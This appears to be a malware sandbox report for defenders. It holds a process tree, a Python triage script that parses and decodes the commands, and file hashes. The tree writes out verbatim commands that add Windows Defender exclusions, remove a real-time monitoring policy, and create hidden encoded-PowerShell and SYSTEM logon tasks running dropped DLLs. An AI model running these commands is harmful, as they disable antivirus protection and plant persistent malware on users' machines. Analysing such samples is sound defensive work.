    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32

  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64

  C:\Windows\SysWOW64\cmd.exe
    cmd /C copy nul "C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf"

  C:\Windows\SysWOW64\wscript.exe
    wscript "C:\Windows\Temp\uxsKyVOxFpVdyluD\ARMIOEIN\hmFmhwugdTajFBiS.wsf"

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:32
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:64
      - Windows security bypass

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GiPqhqLluuCEC" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aSRIytoBnSqU2" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lOSXAGLcobUn" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hduqDfvYrAfrHLVB" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:32

    C:\Windows\SysWOW64\reg.exe
      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\uxsKyVOxFpVdyluD" /t REG_DWORD /d 0 /reg:643⤵
-
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gCqZdsRvg" /SC once /ST 03:57:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gCqZdsRvg"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gCqZdsRvg"
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
  C:\Windows\SysWOW64\cmd.exe
    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    C:\Windows\SysWOW64\reg.exe
      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "nXyehDwmHPyyRtSpH"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "nXyehDwmHPyyRtSpH2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "nXyehDwmHPyyRtSpH2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "aPDUmbyOvRHXxkUgy"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "aPDUmbyOvRHXxkUgy2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "aPDUmbyOvRHXxkUgy2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "MVHoCtCeIZaPacKATKY"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "MVHoCtCeIZaPacKATKY2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "MVHoCtCeIZaPacKATKY2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "QyHDZeZycVybuDMKzsX"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "QyHDZeZycVybuDMKzsX2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "QyHDZeZycVybuDMKzsX2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HCtEkPSKU\TwUOyK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kuRaZQzPzSEXqOG" /V1 /F
    - Drops file in Windows directory
    - Creates scheduled task(s)
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "LHaWkDmLjErwAUu"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "LHaWkDmLjErwAUu"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "LHaWkDmLjErwAUu2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "LHaWkDmLjErwAUu2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "FDoxwemLCToLkG"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "FDoxwemLCToLkG"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "ZqYrCjlOPEYEs"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ZqYrCjlOPEYEs"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "ZqYrCjlOPEYEs2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "ZqYrCjlOPEYEs2"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "kuRaZQzPzSEXqOG2" /F /xml "C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /END /TN "kuRaZQzPzSEXqOG"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "kuRaZQzPzSEXqOG"
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "JtqMXtEvkLBXZN" /F /xml "C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "lYzkwzoDPQRBQ2" /F /xml "C:\ProgramData\hduqDfvYrAfrHLVB\MDHwiOF.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "aPDUmbyOvRHXxkUgy2" /F /xml "C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
  C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "QyHDZeZycVybuDMKzsX2" /F /xml "C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml" /RU "SYSTEM"
    - Creates scheduled task(s)
  C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 268
    - Program crash
C:\Windows\system32\taskeng.exe
  taskeng.exe {6C351B03-A3D7-47AE-A392-9852CA7550D7} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\gpupdate.exe
      "C:\Windows\system32\gpupdate.exe" /force
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\gpupdate.exe
      "C:\Windows\system32\gpupdate.exe" /force
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\gpupdate.exe
      "C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
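The process tree above is the part of this report a responder actually works from: every Defender exclusion is written four times (the Policies key and the product key, each with /reg:32 and /reg:64, which is why each path appears twice in the Signatures list), a one-shot task is created, run and deleted within three commands so that an encoded PowerShell runs under the Admin account, ONLOGON tasks are registered as SYSTEM to run rundll32 on a DLL under Program Files (x86), and the DisableRealtimeMonitoring policy value is removed again afterwards. The helper below is an added example written for this page, not code from the report, the sandbox or the sample; the function names are my own. It tokenises the command lines the way cmd.exe does for quoted arguments, decodes the -EncodedCommand blob (UTF-16LE under base64, which here decodes to start-process -WindowStyle Hidden gpupdate.exe /force, matching the gpupdate.exe /force child in the tree), and folds everything into one findings dictionary. The sample input is a subset of the command lines copied from the tree above.

```python
"""Triage helpers for the reg.exe / schtasks / powershell lines in a sandbox process tree.
Added example for this page; not code from the report, the sandbox or the analysed sample."""
import base64
import re

# Windows-style tokenizer: a double-quoted string (with \" escapes) is one token,
# everything else splits on whitespace.  Surrounding quotes are stripped.
_TOKEN_RE = re.compile(r'"((?:\\.|[^"\\])*)"|(\S+)')
# -EncodedCommand / -enc / -e followed by base64, on a bare powershell line or in a /TR value.
_ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.I)
_EXCLUSION_RE = re.compile(r"\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)", re.I)


def tokenize(cmdline):
    tokens = []
    for m in _TOKEN_RE.finditer(cmdline):
        tokens.append(m.group(1).replace('\\"', '"') if m.group(1) is not None else m.group(2))
    return tokens


def _image_name(token):
    return token.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of the UTF-16LE script text; None if it does not decode."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_reg(cmdline):
    """Operation, key, value name/data and registry view of a reg.exe command line, else None."""
    t = tokenize(cmdline)
    if len(t) < 3 or _image_name(t[0]) not in ("reg", "reg.exe"):
        return None
    opts = {}
    for i in range(3, len(t)):
        low = t[i].lower()
        if low in ("/v", "/t", "/d") and i + 1 < len(t):
            opts[low] = t[i + 1]
        elif low.startswith("/reg:"):          # /reg:32 or /reg:64 selects the WOW64 view
            opts["view"] = low[5:]
    m = _EXCLUSION_RE.search(t[2])
    return {"op": t[1].upper(), "key": t[2], "value": opts.get("/v"), "data": opts.get("/d"),
            "view": opts.get("view", "native"), "policy": "\\policies\\" in t[2].lower(),
            "exclusion_kind": m.group(1).lower() if m else None}


def parse_schtasks(cmdline):
    """Action plus /TN /TR /RU /SC /ST /XML of a schtasks command line, else None."""
    t = tokenize(cmdline)
    if not t or _image_name(t[0]) not in ("schtasks", "schtasks.exe"):
        return None
    out = {"action": None}
    for i in range(1, len(t)):
        low = t[i].lower()
        if low in ("/create", "/run", "/end", "/delete", "/change", "/query"):
            out["action"] = low[1:].upper()
        elif low in ("/tn", "/tr", "/ru", "/sc", "/st", "/xml") and i + 1 < len(t):
            out[low[1:]] = t[i + 1]
    return out


def triage(cmdlines):
    """Fold a list of command lines into the findings a responder cares about."""
    rep = {"exclusions": {}, "policy_exclusions": {}, "tasks_created": {},
           "system_tasks": [], "task_churn": [], "realtime_tamper": [], "decoded": []}
    for c in cmdlines:
        r = parse_reg(c)
        if r is not None:
            if r["op"] == "ADD" and r["exclusion_kind"]:
                bucket = rep["policy_exclusions"] if r["policy"] else rep["exclusions"]
                bucket.setdefault(r["value"], set()).add(r["view"])
            if ("real-time protection" in r["key"].lower()
                    and (r["value"] or "").lower() == "disablerealtimemonitoring"):
                rep["realtime_tamper"].append((r["op"], r["view"]))
            continue
        s = parse_schtasks(c)
        if s is not None:
            if s["action"] == "CREATE":
                rep["tasks_created"][s.get("tn")] = s
                if (s.get("ru") or "").upper() == "SYSTEM":
                    rep["system_tasks"].append(s.get("tn"))
            elif s["action"] in ("RUN", "END", "DELETE"):
                rep["task_churn"].append((s["action"], s.get("tn")))
        m = _ENCODED_RE.search(c)
        if m:
            rep["decoded"].append(decode_encoded_command(m.group(1)))
    return rep


# Command lines copied from the process tree in this report (a representative subset).
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:32',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\mmgEpNvCkevyncfzp" /t REG_DWORD /d 0 /reg:64',
    r'"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HCtEkPSKU" /t REG_DWORD /d 0 /reg:32',
    r'schtasks /CREATE /TN "gCqZdsRvg" /SC once /ST 03:57:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'schtasks /run /I /tn "gCqZdsRvg"',
    r'schtasks /DELETE /F /TN "gCqZdsRvg"',
    r'REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\HCtEkPSKU\TwUOyK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "kuRaZQzPzSEXqOG" /V1 /F',
    r'schtasks /CREATE /TN "kuRaZQzPzSEXqOG2" /F /xml "C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml" /RU "SYSTEM"',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
]

if __name__ == "__main__":
    for name, finding in triage(SAMPLE_CMDLINES).items():
        print(f"{name}: {finding}")
```

The view bookkeeping is the part worth keeping: a host check that reads only one of the four locations (Policies or product key, 32-bit or 64-bit view) will miss exclusions this sample writes, so enumerate all four, and treat a SYSTEM ONLOGON task whose action is rundll32 on a DLL under Program Files (x86) or ProgramData as persistence rather than as a vendor updater.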
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
C:\Program Files (x86)\GiPqhqLluuCEC\tKphAJs.xml
  Filesize: 2KB
  MD5: c4ba44b6ef23e4d8d107d2260eea2841
  SHA1: 414fd6d2125b0f61e567851c364e938928fc77c7
  SHA256: 1a92133dc9bc9b20a9215de4de5f7852b254fa8500ff5a3476edc7e4f1791747
  SHA512: 4313f1c143c3f82b422f176122fe3d990df81112f27da493923cd6043106b694b0bc07a29192fc139dbf99bd13778627bd9ae9bcf3f64ce2e2d730f7361ffa17

C:\Program Files (x86)\HCtEkPSKU\zVkbFST.xml
  Filesize: 2KB
  MD5: 57c824c11c3e6ed179c67939b45c85b3
  SHA1: 624866f8b091a6e589a4440e45038a3893ce2c02
  SHA256: 41b10bcd1e4493f2cd1e9aa1748c652b61b6234f645d7daf291449e3a340f435
  SHA512: bcb9b6cb31ca2525130406fabc32fcfd8ee1a2551362329db9aa0082b42c783d5579d697fd07909293bf95849cbab6c4bf5ef243f1b7e5ad0a4c50377cb75777

C:\Program Files (x86)\aSRIytoBnSqU2\FpXhoUA.xml
  Filesize: 2KB
  MD5: 8c1dee459fe5e32abf00e036e63d0fae
  SHA1: 21784a082e6edd54c0a386f2a4ed62c929c0965f
  SHA256: a45bc97d1465f1b16d86d9867c716f1b55561c3605edd8048a7a686c5f4b6f98
  SHA512: bedf6ffa0e4abb787e3a0370aa40abbfdc53903bb61f772b2e3a46b9b3da146fb7446c0048ef2504292e545736cedf71c2728550428fbe63f6bcc7ed90e91d36

C:\Program Files (x86)\fkVxgwnPJOPtkToWdFR\yuHZwHb.xml
  Filesize: 2KB
  MD5: d67f0d5ccb365632ac259b64994c2405
  SHA1: 4aeca6afe89dc6bd683b38a78fdce3a3f594bd66
  SHA256: 37c82ba01190f57c9c19d95496704eddf8082dedd52cd58c69c5fc810df9a668
  SHA512: d2bf374e7d0169e7577958c702195358cc0c9f77924fce8a135491320d8ad3040798c97e053b508412a351dec3c4b92bfbe4745a029fb3ae2df2e595dc1f1976

C:\Program Files\Mozilla Firefox\browser\features\{D8D101C7-1C16-4DF6-97DE-CD81AC16A495}.xpi
  Filesize: 640KB
  MD5: c18ffa61f37cd70c6e84068b104217e0
  SHA1: 6709a23ee9865872924fba28f2f177c59011eed8
  SHA256: fd430e616b8572849fb1c39b0c1f5c5cb7c243243ddf4c4a1a4a2c7a4fd84a7e
  SHA512: 742fea837bf81178bbbca5869dd36d2bfe97e810ef03c732c35423cdd5aaa54f455afa0b7adb6f6e9889dd09879eba83e2e13271e658f263d1f2f9e7acf9fc2e

C:\ProgramData\hduqDfvYrAfrHLVB\MDHwiOF.xml
  Filesize: 2KB
  MD5: 0f8ab85c7c1a4428b45a80658598d1cc
